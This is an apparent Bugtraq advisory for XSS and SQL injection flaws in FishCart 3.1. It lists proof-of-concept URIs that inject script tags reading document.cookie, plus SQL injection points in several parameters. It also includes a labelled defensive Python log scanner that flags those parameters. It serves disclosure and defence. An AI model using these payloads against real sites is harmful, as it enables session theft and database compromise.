FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
BID:13499
Info
| Bugtraq ID: | 13499 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | Jan 25 2007 04:26PM |
| Credit: | dcrab is credited with the discovery of these vulnerabilities. |
| Vulnerable: | FishNet FishCart 3.1 |
| Not Vulnerable: | FishNet FishCart 3.2 RC1 |
Discussion
FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
A successful exploit of the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
An attacker can exploit these issues through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script>
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
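For defenders reviewing web server logs, the following added example (not part of the original advisory and not FishCart code) flags requests in which the parameters named in the proof-of-concept URIs above carry quote or angle-bracket characters. The log lines are constructed, and the Common Log Format layout and the names WATCHED, flag_line and scan are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name -> parameters that the advisory's proof-of-concept URIs target.
WATCHED = {
    "display.php": {"nlst", "psku"},
    "upstracking.php": {"trackingnum", "reqagree", "m"},
    "upstnt.php": {"cartid"},
}
# The proof-of-concept values all rely on quotes or angle brackets.
SUSPICIOUS = re.compile(r"""['"<>]""")
# Request field of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/May/2005:10:00:00 +0000] "GET /demo31/display.php'
    '?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [04/May/2005:10:00:05 +0000] "GET /demo31/upstracking.php'
    '?trackingnum=%27%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E'
    '&reqagree=checked&m= HTTP/1.1" 200 2048',
    '192.0.2.12 - - [04/May/2005:10:00:09 +0000] "GET /demo31/upstnt.php'
    '?zid=1&lid=1&cartid=%27SQL_INJECTION HTTP/1.1" 200 1024',
]

def flag_line(line):
    """Return [(script, param, decoded_value)] for watched parameters
    whose decoded value contains a quote or angle bracket."""
    match = REQUEST.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    hits = []
    # parse_qsl percent-decodes values, so encoded payloads are caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and SUSPICIOUS.search(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Return [(line_number, hit)] for every flagged parameter in the log."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in flag_line(line)]

if __name__ == "__main__":
    for number, (script, name, value) in scan(SAMPLE_LOG):
        print(f"line {number}: {script} {name}={value!r}")
```

A match indicates probing of these parameters, not a successful compromise; whether a request reached vulnerable code depends on the installed version (3.1 is listed as vulnerable, 3.2 RC1 as not).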
Solution / Fix
Solution:
The vendor released an update to address these issues. Please see the references for more information.
References
References:
- FishCart Homepage (FishNet Inc.)
- Re: [fishcart] concerned about security (FishNet Inc.)
- Multiple SQL injections and XSS in FishCart 3.1 (dcrab)